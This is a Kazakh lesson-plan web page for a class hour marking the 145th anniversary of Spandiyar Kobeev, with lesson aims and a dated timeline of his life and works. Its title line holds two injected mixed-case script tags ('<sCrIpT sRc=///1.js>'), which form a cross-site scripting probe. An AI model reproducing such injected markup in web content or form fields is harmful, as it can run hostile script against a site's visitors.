Спандияр Көбеевтің туғанына -145 жыл<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

29.10.2023

Тәрбие сағаты тақырыбы : Спандияр Көбеевтің туғанына -145 ж

Сабақтың мақсаты:автордың өмірі мен шығармашылығын меңгерту.Қазақ поэзиясына мағыналы әңгімелер мен мысалдарды жазуды мақсат еткен туындыларының идеялық мазмұнын ұғындыру; әр оқушы осы автор арқылы шығармалар негізінде өзіндік ой-қиялына ерік бере отырып өзінше ой түюге баулу, шығармашылық жұмысқа жұмылдыру арқылы таным-түсініктерін дамыту, шеберліктерін арттыру. ақын-жазушының қаламынан туған мысал, әңгімелер арқылы оқушыларды адами қасиеттерге баулу, автор көтерген тағылымдар арқылы жазушының азаматтық бейнесін аша отырып, оқушылардың адамгершілік қасиеттерін арттыру, үлгі-өнеге алуға шақыру.

Аудармашы    жазушы   педагог     ақын   қоғам қайраткері  Қазақстанның Еңбек сіңірген мұғалімі

1.Мұғалім сөзі:Тақтадан С.Көбеевке қатысты жылдар мен болған оқиғалар туралы мәлімет беріледі.

Жылдар сөйлейді:

1878 жыл  қазанның 1-і Спандияр КөбеевҚостанай облысы, Боровский ауданының Ақсуат ауылында кедей шаруа семьясында дүниеге келген.

1887 ж.   желтоқсан айында Алтынсариннiң тiкелей көмегiмен ашылған мектепке барады.

1892-1897ж.ж. Болыстық мектепте оқиды.

1899 жылы Қостанай қаласында ашылған орыс-қазақ екі кластық курсқа түседі.

1901 жылы Бастауыш мектеп мұғалiмi деген мамандық бойынша бiтiрiп шығады.

1910 жылы Алғашқы кітабы «Үлгілі тәржімә» Қазан қаласында жарық көреді.

1912 жылы «Үлгілі бала» оқулық-хрестоматиясы жарық көреді.

1913 жылы «Қалың мал» романы басылып шығады.

1951 жылы «Орындалған арман» атты өмірбаяндық шығармасы жарық көреді.

1956 жылы Өмірден өтеді.

Просмотров: 5185


Пікір қосу



Деректерді қолтаңбаға қосу